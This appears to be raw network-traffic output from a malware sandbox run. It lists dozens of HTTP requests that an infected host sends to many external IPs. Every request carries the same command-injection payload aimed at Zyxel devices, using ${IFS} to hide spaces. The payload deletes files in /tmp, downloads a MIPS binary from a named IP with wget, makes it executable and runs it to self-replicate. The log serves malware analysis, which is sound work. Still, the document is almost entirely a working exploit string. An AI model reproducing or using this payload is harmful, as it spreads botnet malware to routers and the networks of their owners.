                                        Jan 14, 2024 16:18:33.181556940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1282192.168.2.1333278142.243.79.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181586981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1283192.168.2.1343058146.123.95.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181627989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1284192.168.2.134066462.103.60.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181677103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1285192.168.2.1340828190.39.7.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181725025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1286192.168.2.1349602219.81.18.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181766033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1287192.168.2.1352890135.4.178.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181813955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1288192.168.2.1348468152.193.138.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181843996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1289192.168.2.135097867.233.229.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181876898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1290192.168.2.1344452219.197.170.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181910038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1291192.168.2.1341032160.30.84.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181958914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1292192.168.2.1340526145.6.230.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181989908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1293192.168.2.135844840.27.236.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182044983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1294192.168.2.1335818175.130.181.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182074070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1295192.168.2.1344638204.77.161.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182086945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1296192.168.2.1349332212.35.238.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182115078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1297192.168.2.1356686131.204.49.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182171106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1298192.168.2.135675246.236.202.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182216883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1299192.168.2.1347252112.109.209.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182243109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1300192.168.2.1347544168.41.222.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182286024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1301192.168.2.1342944179.189.195.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182337999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1302192.168.2.135800420.72.196.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182425022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1303192.168.2.1345794108.186.1.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182425976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1304192.168.2.1347412150.38.19.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182482004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1305192.168.2.1341312181.174.135.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182528973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1306192.168.2.134369493.218.116.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182557106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1307192.168.2.1346952204.2.188.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182619095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1308192.168.2.1337780162.139.131.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182626009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1309192.168.2.1360132169.210.226.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182699919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1310192.168.2.134574847.156.13.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182724953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1311192.168.2.1333442101.98.190.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182768106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1312192.168.2.1358138186.60.178.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182801962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1313192.168.2.135075648.84.250.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182838917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1314192.168.2.133471449.253.101.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182882071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1315192.168.2.134413451.158.105.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182914019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1316192.168.2.1333762223.162.215.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182950020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1317192.168.2.133843497.51.227.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.182991028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1318192.168.2.134183843.64.180.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183024883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1319192.168.2.1333194158.116.132.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183090925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1320192.168.2.134203687.168.156.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183130026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1321192.168.2.1360542134.111.94.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183170080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1322192.168.2.133475680.101.184.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183209896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1323192.168.2.134715213.162.102.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183264017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1324192.168.2.1350566199.119.84.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183298111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1325192.168.2.134956891.54.29.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183352947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1326192.168.2.13351565.80.37.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183414936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1327192.168.2.1349684176.193.133.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183443069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1328192.168.2.1341598160.102.148.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183476925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1329192.168.2.1348354164.111.95.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183525085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1330192.168.2.1356096174.167.171.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183571100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1331192.168.2.1345522178.67.39.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183624983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1332192.168.2.1351876154.95.163.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183660984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1333192.168.2.133985840.175.254.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183681011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1334192.168.2.1360240154.88.135.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183698893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1335192.168.2.1338480204.141.245.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183743000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1336192.168.2.1333236111.116.120.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183799982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1337192.168.2.1355256211.12.186.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183832884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1338192.168.2.1344716212.87.122.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183861017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1339192.168.2.1341148139.133.166.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183911085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1340192.168.2.134974477.90.212.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.183963060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1341192.168.2.134426680.205.240.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184000015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1342192.168.2.1334692166.97.229.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184045076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1343192.168.2.1354262182.180.93.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184072971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1344192.168.2.1336032102.170.78.169443
                                        TimestampBytes transferredDirectionData
